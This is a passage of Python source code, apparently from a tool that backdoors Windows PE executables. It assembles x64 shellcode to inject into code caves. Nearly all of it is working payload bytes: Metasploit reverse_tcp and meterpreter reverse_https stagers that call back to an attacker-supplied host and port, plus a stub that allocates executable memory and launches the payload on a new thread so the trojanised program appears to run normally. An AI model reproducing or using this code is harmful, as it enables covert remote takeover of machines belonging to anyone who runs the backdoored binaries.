                            "\x48\x31\xd2\x90\x90\x90\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
                            "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
                            "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
                            "\x72\x6f\x6a\x00\x59\x41\x89\xda"
                            "\x48\x81\xc4\xf8\x00\x00\x00"  # Add RSP X ; align stack
                            )
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
        return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
    def reverse_tcp_stager_threaded(self, flItms, CavesPicked={}):
        """
        Ported the x32 payload from msfvenom for patching win32 binaries (shellcode1)
        with the help of Steven Fewer's work on msf win64 payloads.

        Builds a stager that VirtualAllocs RWX memory, copies shellcode2 (the
        msf reverse_tcp stage-1) into it, and launches it on a new thread via
        CreateThread so the host binary keeps running.  The relative-jump
        displacement constants (272, 244, -4, -3, -5) are hand-tuned to the
        exact byte lengths of the stubs below -- do not adjust them without
        re-deriving the offsets.  Requires self.HOST and self.PORT; returns
        False if either is missing, otherwise (stackpreserve+shellcode1,
        shellcode2).
        """
        if self.PORT is None:
            print ("This payload requires the PORT parameter -P")
            return False
        if self.HOST is None:
            print "This payload requires a HOST parameter -H"
            return False
        flItms['stager'] = True
        #overloading the class stackpreserve
        self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
                              "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
                              )
        breakupvar = eat_code_caves(flItms, 0, 1)
        #get_payload: #Jump back with the address for the payload on the stack.
        if flItms['cave_jumping'] is True:
            self.shellcode2 = "\xe8"
            if breakupvar > 0:
                if len(self.shellcode2) < breakupvar:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
                                                   len(self.shellcode2) + 272).rstrip('L')), 16))
                else:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
                                                   breakupvar + 272).rstrip('L')), 16))
            else:
                self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
                                               len(self.shellcode2) + 244).rstrip('L')), 16))
        else:
            self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
        """
        shellcode2
        /*
         * windows/x64/shell/reverse_tcp - 422 bytes (stage 1)
         ^^windows/x64/meterpreter/reverse_tcp will work with this
         * http://www.metasploit.com
         * VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
         */
        """
        # When staying in the original cave, prepend either the cave-cleaning
        # stub or 90 bytes of 0x41 filler so the payload lands at the same
        # fixed distance from the call above.
        if flItms['NewCodeCave'] is False:
            if CavesPicked != {}:
                self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
            else:
                self.shellcode2 += "\x41" * 90
        #payload
        self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
                            "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
                            "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
                            "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
                            "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
                            "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
                            "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
                            "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
                            "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
                            "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
                            "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
                            "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
                            "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
                            "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
                            "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
                            "\x49\x89\xe5\x49\xbc\x02\x00"
                            )
        self.shellcode2 += struct.pack('!H', self.PORT)
        self.shellcode2 += self.pack_ip_addresses()
        self.shellcode2 += ("\x41\x54"
                            "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
                            "\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
                            "\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
                            "\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
                            "\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
                            "\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x48\x83\xec"
                            "\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41"
                            "\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e\x6a\x40\x41"
                            "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
                            "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
                            "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
                            "\x5f\xff\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41"
                            "\xff\xe7"
                            )
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ("\x90"  # <--THAT'S A NOP. \o/
                           "\xe8\xc0\x00\x00\x00"  # jmp to allocate
                           #api_call
                           "\x41\x51"  # push r9
                           "\x41\x50"  # push r8
                           "\x52"  # push rdx
                           "\x51"  # push rcx
                           "\x56"  # push rsi
                           "\x48\x31\xD2"  # xor rdx,rdx
                           "\x65\x48\x8B\x52\x60"  # mov rdx,qword ptr gs:[rdx+96]
                           "\x48\x8B\x52\x18"  # mov rdx,qword ptr [rdx+24]
                           "\x48\x8B\x52\x20"  # mov rdx,qword ptr[rdx+32]
                           #next_mod
                           "\x48\x8b\x72\x50"  # mov rsi,[rdx+80]
                           "\x48\x0f\xb7\x4a\x4a"  # movzx rcx,word [rdx+74]
                           "\x4d\x31\xc9"  # xor r9,r9
                           #loop_modname
                           "\x48\x31\xc0"  # xor rax,rax
                           "\xac"  # lods
                           "\x3c\x61"  # cmp al, 61h (a)
                           "\x7c\x02"  # jl 02
                           "\x2c\x20"  # sub al, 0x20
                           #not_lowercase
                           "\x41\xc1\xc9\x0d"  # ror r9d, 13
                           "\x41\x01\xc1"  # add r9d, eax
                           "\xe2\xed"  # loop until read, back to xor rax, rax
                           "\x52"  # push rdx ; Save the current position in the module list for later
                           "\x41\x51"  # push r9 ; Save the current module hash for later
                           # ; Proceed to itterate the export address table,
                           "\x48\x8b\x52\x20"  # mov rdx, [rdx+32] ; Get this modules base address
                           "\x8b\x42\x3c"  # mov eax, dword [rdx+60] ; Get PE header
                           "\x48\x01\xd0"  # add rax, rdx ; Add the modules base address
                           "\x8b\x80\x88\x00\x00\x00"  # mov eax, dword [rax+136] ; Get export tables RVA
                           "\x48\x85\xc0"  # test rax, rax ; Test if no export address table is present
                           "\x74\x67"  # je get_next_mod1 ; If no EAT present, process the next module
                           "\x48\x01\xd0"  # add rax, rdx ; Add the modules base address
                           "\x50"  # push rax ; Save the current modules EAT
                           "\x8b\x48\x18"  # mov ecx, dword [rax+24] ; Get the number of function names
                           "\x44\x8b\x40\x20"  # mov r8d, dword [rax+32] ; Get the rva of the function names
                           "\x49\x01\xd0"  # add r8, rdx ; Add the modules base address
                           # ; Computing the module hash + function hash
                           #get_next_func: ;
                           "\xe3\x56"  # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
                           "\x48\xff\xc9"  # dec rcx ; Decrement the function name counter
                           "\x41\x8b\x34\x88"  # mov esi, dword [r8+rcx*4]; Get rva of next module name
                           "\x48\x01\xd6"  # add rsi, rdx ; Add the modules base address
                           "\x4d\x31\xc9"  # xor r9, r9 ; Clear r9 which will store the hash of the function name
                           # ; And compare it to the one we wan
                           #loop_funcname: ;
                           "\x48\x31\xc0"  # xor rax, rax ; Clear rax
                           "\xac"  # lodsb ; Read in the next byte of the ASCII function name
                           "\x41\xc1\xc9\x0d"  # ror r9d, 13 ; Rotate right our hash value
                           "\x41\x01\xc1"  # add r9d, eax ; Add the next byte of the name
                           "\x38\xe0"  # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
                           "\x75\xf1"  # jne loop_funcname ; If we have not reached the null terminator, continue
                           "\x4c\x03\x4c\x24\x08"  # add r9, [rsp+8] ; Add the current module hash to the function hash
                           "\x45\x39\xd1"  # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
                           "\x75\xd8"  # jnz get_next_func ; Go compute the next function hash if we have not found it
                           # ; If found, fix up stack, call the function and then value else compute the next one...
                           "\x58"  # pop rax ; Restore the current modules EAT
                           "\x44\x8b\x40\x24"  # mov r8d, dword [rax+36] ; Get the ordinal table rva
                           "\x49\x01\xd0"  # add r8, rdx ; Add the modules base address
                           "\x66\x41\x8b\x0c\x48"  # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
                           "\x44\x8b\x40\x1c"  # mov r8d, dword [rax+28] ; Get the function addresses table rva
                           "\x49\x01\xd0"  # add r8, rdx ; Add the modules base address
                           "\x41\x8b\x04\x88"  # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
                           "\x48\x01\xd0"  # add rax, rdx ; Add the modules base address to get the functions actual VA
                           # ; We now fix up the stack and perform the call to the drsired function...
                           #finish:
                           "\x41\x58"  # pop r8 ; Clear off the current modules hash
                           "\x41\x58"  # pop r8 ; Clear off the current position in the module list
                           "\x5E"  # pop rsi ; Restore RSI
                           "\x59"  # pop rcx ; Restore the 1st parameter
                           "\x5A"  # pop rdx ; Restore the 2nd parameter
                           "\x41\x58"  # pop r8 ; Restore the 3rd parameter
                           "\x41\x59"  # pop r9 ; Restore the 4th parameter
                           "\x41\x5A"  # pop r10 ; pop off the return address
                           "\x48\x83\xEC\x20"  # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
                           # ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
                           "\x41\x52"  # push r10 ; push back the return address
                           "\xFF\xE0"  # jmp rax ; Jump into the required function
                           # ; We now automagically return to the correct caller...
                           # get_next_mod:
                           "\x58"  # pop rax ; Pop off the current (now the previous) modules EAT
                           # get_next_mod1:
                           "\x41\x59"  # pop r9 ; Pop off the current (now the previous) modules hash
                           "\x5A"  # pop rdx ; Restore our position in the module list
                           "\x48\x8B\x12"  # mov rdx, [rdx] ; Get the next module
                           "\xe9\x57\xff\xff\xff"  # jmp next_mod ; Process this module
                           )
        # allocate
        self.shellcode1 += ("\x5d"  # pop rbp
                            "\x49\xc7\xc6")  # mov r14, size of payload below
        self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
        self.shellcode1 += ("\x6a\x40"  # push 40h
                            "\x41\x59"  # pop r9 now 40h
                            "\x68\x00\x10\x00\x00"  # push 1000h
                            "\x41\x58"  # pop r8.. now 1000h
                            "\x4C\x89\xF2"  # mov rdx, r14
                            "\x6A\x00"  # push 0
                            "\x59"  # pop rcx
                            "\x68\x58\xa4\x53\xe5"  # push E553a458
                            "\x41\x5A"  # pop r10
                            "\xff\xd5"  # call rbp
                            "\x48\x89\xc3"  # mov rbx, rax ; Store allocated address in ebx
                            "\x48\x89\xc7"  # mov rdi, rax ; Prepare EDI with the new address
                            "\x48\xC7\xC1"
                            )
        self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
        #call the get_payload right before the payload
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip('L')), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
            else:
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xeb\x43"
        # got_payload:
        self.shellcode1 += ("\x5e"  # pop rsi ; Prepare ESI with the source to copy
                            "\xf2\xa4"  # rep movsb ; Copy the payload to RWX memory
                            "\xe8\x00\x00\x00\x00"  # call set_handler ; Configure error handling
                            #set_handler:
                            "\x48\x31\xC0"  # xor rax,rax
                            "\x50"  # push rax ; LPDWORD lpThreadId (NULL)
                            "\x50"  # push rax ; DWORD dwCreationFlags (0)
                            "\x49\x89\xC1"  # mov r9, rax ; LPVOID lpParameter (NULL)
                            "\x48\x89\xC2"  # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
                            "\x49\x89\xD8"  # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
                            "\x48\x89\xC1"  # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
                            "\x49\xC7\xC2\x38\x68\x0D\x16"  # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
                            "\xFF\xD5"  # call rbp ; Spawn payload thread
                            "\x48\x83\xC4\x58"  # add rsp, 50
                            #stackrestore
                            "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
                            "\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
                            )
        breakupvar = eat_code_caves(flItms, 0, 2)
        #Jump to the win64 return to normal execution code segment.
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip('L')), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3).rstrip('L')), 16))
        else:
            #self.shellcode1 += "\xE9\xab\x01\x00\x00"
            self.shellcode1 += "\xe9"
            self.shellcode1 += struct.pack("<I", len(self.shellcode2))
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
        return (self.stackpreserve + self.shellcode1, self.shellcode2)
    def meterpreter_reverse_https_threaded(self, flItms, CavesPicked={}):
        """
        Win64 version.

        Same structure as reverse_tcp_stager_threaded, but shellcode2 is the
        msf windows/x64/meterpreter/reverse_https stage-1 (wininet based):
        shellcode1 resolves APIs by hash, VirtualAllocs RWX memory, copies
        shellcode2 in and runs it on a new CreateThread so the host binary
        keeps executing.  PORT is spliced little-endian ('<H') and HOST is
        appended as a NUL-terminated string for InternetConnectA.  The jump
        displacement constants (272, 244, -4, -3, -5) are hand-tuned to the
        stub byte lengths -- do not adjust without re-deriving.  Requires
        self.HOST and self.PORT; returns False if either is missing,
        otherwise (stackpreserve+shellcode1, shellcode2).
        """
        if self.PORT is None:
            print ("This payload requires the PORT parameter -P")
            return False
        if self.HOST is None:
            print "This payload requires a HOST parameter -H"
            return False
        flItms['stager'] = True
        #overloading the class stackpreserve
        self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
                              "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
                              )
        breakupvar = eat_code_caves(flItms, 0, 1)
        #get_payload: #Jump back with the address for the payload on the stack.
        if flItms['cave_jumping'] is True:
            self.shellcode2 = "\xe8"
            if breakupvar > 0:
                if len(self.shellcode2) < breakupvar:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
                                                   len(self.shellcode2) + 272).rstrip('L')), 16))
                else:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
                                                   breakupvar + 272).rstrip('L')), 16))
            else:
                self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
                                               len(self.shellcode2) + 244).rstrip('L')), 16))
        else:
            self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
        """
        /*
         * windows/x64/meterpreter/reverse_https - 587 bytes (stage 1)
         * http://www.metasploit.com
         * VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
         * SessionExpirationTimeout=604800,
         * SessionCommunicationTimeout=300,
         * MeterpreterUserAgent=Mozilla/4.0 (compatible; MSIE 6.1;
         * Windows NT), MeterpreterServerName=Apache,
         * ReverseListenerBindPort=0,
         * HttpUnknownRequestResponse=<html><body><h1>It
         * works!</h1></body></html>, EnableStageEncoding=false,
         * PrependMigrate=false, EXITFUNC=thread, AutoLoadStdapi=true,
         * InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
         * EnableUnicodeEncoding=true
         */
        """
        # When staying in the original cave, prepend either the cave-cleaning
        # stub or 90 bytes of 0x41 filler to keep the payload's distance from
        # the call above constant.
        if flItms['NewCodeCave'] is False:
            if CavesPicked != {}:
                self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
            else:
                self.shellcode2 += "\x41" * 90
        #payload
        self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52"
                            "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
                            "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
                            "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
                            "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
                            "\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00"
                            "\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b"
                            "\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
                            "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
                            "\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
                            "\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
                            "\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41"
                            "\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
                            "\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff"
                            "\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56"
                            "\x49\x89\xe6\x4c\x89\xf1\x49\xba\x4c\x77\x26\x07\x00\x00\x00"
                            "\x00\xff\xd5\x6a\x00\x6a\x00\x48\x89\xe1\x48\x31\xd2\x4d\x31"
                            "\xc0\x4d\x31\xc9\x41\x50\x41\x50\x49\xba\x3a\x56\x79\xa7\x00"
                            "\x00\x00\x00\xff\xd5\xe9\x9e\x00\x00\x00\x5a\x48\x89\xc1\x49"
                            "\xb8")
        self.shellcode2 += struct.pack("<H", self.PORT)
        self.shellcode2 += ("\x00\x00\x00\x00\x00\x00\x4d\x31\xc9\x41\x51\x41"
                            "\x51\x6a\x03\x41\x51\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00"
                            "\xff\xd5\xeb\x7c\x48\x89\xc1\x48\x31\xd2\x41\x58\x4d\x31\xc9"
                            "\x52\x68\x00\x32\xa0\x84\x52\x52\x49\xba\xeb\x55\x2e\x3b\x00"
                            "\x00\x00\x00\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x48"
                            "\xba\x1f\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x68\x80\x33\x00"
                            "\x00\x49\x89\xe0\x49\xb9\x04\x00\x00\x00\x00\x00\x00\x00\x49"
                            "\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x48\x89\xf1\x48"
                            "\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x52\x52\x49\xba\x2d\x06\x18"
                            "\x7b\x00\x00\x00\x00\xff\xd5\x85\xc0\x75\x24\x48\xff\xcf\x74"
                            "\x13\xeb\xb1\xe9\x81\x00\x00\x00\xe8\x7f\xff\xff\xff\x2f\x75"
                            "\x47\x48\x58\x00\x00\x49\xbe\xf0\xb5\xa2\x56\x00\x00\x00\x00"
                            "\xff\xd5\x48\x31\xc9\x48\xba\x00\x00\x40\x00\x00\x00\x00\x00"
                            "\x49\xb8\x00\x10\x00\x00\x00\x00\x00\x00\x49\xb9\x40\x00\x00"
                            "\x00\x00\x00\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00"
                            "\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda"
                            "\x49\xb8\x00\x20\x00\x00\x00\x00\x00\x00\x49\x89\xf9\x49\xba"
                            "\x12\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85"
                            "\xc0\x74\x99\x48\x8b\x07\x48\x01\xc3\x48\x85\xc0\x75\xce\x58"
                            "\x58\xc3\xe8\xd7\xfe\xff\xff")
        # Callback hostname, NUL-terminated, consumed by InternetConnectA.
        self.shellcode2 += self.HOST
        self.shellcode2 += "\x00"
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ("\x90"  # <--THAT'S A NOP. \o/
                           "\xe8\xc0\x00\x00\x00"  # jmp to allocate
                           #api_call
                           "\x41\x51"  # push r9
                           "\x41\x50"  # push r8
                           "\x52"  # push rdx
                           "\x51"  # push rcx
                           "\x56"  # push rsi
                           "\x48\x31\xD2"  # xor rdx,rdx
                           "\x65\x48\x8B\x52\x60"  # mov rdx,qword ptr gs:[rdx+96]
                           "\x48\x8B\x52\x18"  # mov rdx,qword ptr [rdx+24]
                           "\x48\x8B\x52\x20"  # mov rdx,qword ptr[rdx+32]
                           #next_mod
                           "\x48\x8b\x72\x50"  # mov rsi,[rdx+80]
                           "\x48\x0f\xb7\x4a\x4a"  # movzx rcx,word [rdx+74]
                           "\x4d\x31\xc9"  # xor r9,r9
                           #loop_modname
                           "\x48\x31\xc0"  # xor rax,rax
                           "\xac"  # lods
                           "\x3c\x61"  # cmp al, 61h (a)
                           "\x7c\x02"  # jl 02
                           "\x2c\x20"  # sub al, 0x20
                           #not_lowercase
                           "\x41\xc1\xc9\x0d"  # ror r9d, 13
                           "\x41\x01\xc1"  # add r9d, eax
                           "\xe2\xed"  # loop until read, back to xor rax, rax
                           "\x52"  # push rdx ; Save the current position in the module list for later
                           "\x41\x51"  # push r9 ; Save the current module hash for later
                           # ; Proceed to itterate the export address table,
                           "\x48\x8b\x52\x20"  # mov rdx, [rdx+32] ; Get this modules base address
                           "\x8b\x42\x3c"  # mov eax, dword [rdx+60] ; Get PE header
                           "\x48\x01\xd0"  # add rax, rdx ; Add the modules base address
                           "\x8b\x80\x88\x00\x00\x00"  # mov eax, dword [rax+136] ; Get export tables RVA
                           "\x48\x85\xc0"  # test rax, rax ; Test if no export address table is present
                           "\x74\x67"  # je get_next_mod1 ; If no EAT present, process the next module
                           "\x48\x01\xd0"  # add rax, rdx ; Add the modules base address
                           "\x50"  # push rax ; Save the current modules EAT
                           "\x8b\x48\x18"  # mov ecx, dword [rax+24] ; Get the number of function names
                           "\x44\x8b\x40\x20"  # mov r8d, dword [rax+32] ; Get the rva of the function names
                           "\x49\x01\xd0"  # add r8, rdx ; Add the modules base address
                           #; Computing the module hash + function hash
                           #get_next_func: ;
                           "\xe3\x56"  # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
                           "\x48\xff\xc9"  # dec rcx ; Decrement the function name counter
                           "\x41\x8b\x34\x88"  # mov esi, dword [r8+rcx*4]; Get rva of next module name
                           "\x48\x01\xd6"  # add rsi, rdx ; Add the modules base address
                           "\x4d\x31\xc9"  # xor r9, r9 ; Clear r9 which will store the hash of the function name
                           # ; And compare it to the one we wan
                           #loop_funcname: ;
                           "\x48\x31\xc0"  # xor rax, rax ; Clear rax
                           "\xac"  # lodsb ; Read in the next byte of the ASCII function name
                           "\x41\xc1\xc9\x0d"  # ror r9d, 13 ; Rotate right our hash value
                           "\x41\x01\xc1"  # add r9d, eax ; Add the next byte of the name
                           "\x38\xe0"  # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
                           "\x75\xf1"  # jne loop_funcname ; If we have not reached the null terminator, continue
                           "\x4c\x03\x4c\x24\x08"  # add r9, [rsp+8] ; Add the current module hash to the function hash
                           "\x45\x39\xd1"  # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
                           "\x75\xd8"  # jnz get_next_func ; Go compute the next function hash if we have not found it
                           # ; If found, fix up stack, call the function and then value else compute the next one...
                           "\x58"  # pop rax ; Restore the current modules EAT
                           "\x44\x8b\x40\x24"  # mov r8d, dword [rax+36] ; Get the ordinal table rva
                           "\x49\x01\xd0"  # add r8, rdx ; Add the modules base address
                           "\x66\x41\x8b\x0c\x48"  # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
                           "\x44\x8b\x40\x1c"  # mov r8d, dword [rax+28] ; Get the function addresses table rva
                           "\x49\x01\xd0"  # add r8, rdx ; Add the modules base address
                           "\x41\x8b\x04\x88"  # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
                           "\x48\x01\xd0"  # add rax, rdx ; Add the modules base address to get the functions actual VA
                           #; We now fix up the stack and perform the call to the drsired function...
                           #finish:
                           "\x41\x58"  # pop r8 ; Clear off the current modules hash
                           "\x41\x58"  # pop r8 ; Clear off the current position in the module list
                           "\x5E"  # pop rsi ; Restore RSI
                           "\x59"  # pop rcx ; Restore the 1st parameter
                           "\x5A"  # pop rdx ; Restore the 2nd parameter
                           "\x41\x58"  # pop r8 ; Restore the 3rd parameter
                           "\x41\x59"  # pop r9 ; Restore the 4th parameter
                           "\x41\x5A"  # pop r10 ; pop off the return address
                           "\x48\x83\xEC\x20"  # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
                           # ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
                           "\x41\x52"  # push r10 ; push back the return address
                           "\xFF\xE0"  # jmp rax ; Jump into the required function
                           #; We now automagically return to the correct caller...
                           #get_next_mod: ;
                           "\x58"  # pop rax ; Pop off the current (now the previous) modules EAT
                           #get_next_mod1: ;
                           "\x41\x59"  # pop r9 ; Pop off the current (now the previous) modules hash
                           "\x5A"  # pop rdx ; Restore our position in the module list
                           "\x48\x8B\x12"  # mov rdx, [rdx] ; Get the next module
                           "\xe9\x57\xff\xff\xff"  # jmp next_mod ; Process this module
                           )
        #allocate
        self.shellcode1 += ("\x5d"  # pop rbp
                            "\x49\xc7\xc6"  # mov r14, 1abh size of payload...
                            )
        self.shellcode1 += struct.pack("<H", len(self.shellcode2) - 5)
        self.shellcode1 += ("\x00\x00"
                            "\x6a\x40"  # push 40h
                            "\x41\x59"  # pop r9 now 40h
                            "\x68\x00\x10\x00\x00"  # push 1000h
                            "\x41\x58"  # pop r8.. now 1000h
                            "\x4C\x89\xF2"  # mov rdx, r14
                            "\x6A\x00"  # push 0
                            "\x59"  # pop rcx
                            "\x68\x58\xa4\x53\xe5"  # push E553a458
                            "\x41\x5A"  # pop r10
                            "\xff\xd5"  # call rbp
                            "\x48\x89\xc3"  # mov rbx, rax ; Store allocated address in ebx
                            "\x48\x89\xc7"  # mov rdi, rax ; Prepare EDI with the new address
                            )
        #mov rcx, 0x1abE
        self.shellcode1 += "\x48\xc7\xc1"
        self.shellcode1 += struct.pack("<H", len(self.shellcode2) - 5)
        self.shellcode1 += "\x00\x00"
        #call the get_payload right before the payload
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip('L')), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
            else:
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xeb\x43"
        # got_payload:
        self.shellcode1 += ("\x5e"  # pop rsi ; Prepare ESI with the source to copy
                            "\xf2\xa4"  # rep movsb ; Copy the payload to RWX memory
                            "\xe8\x00\x00\x00\x00"  # call set_handler ; Configure error handling
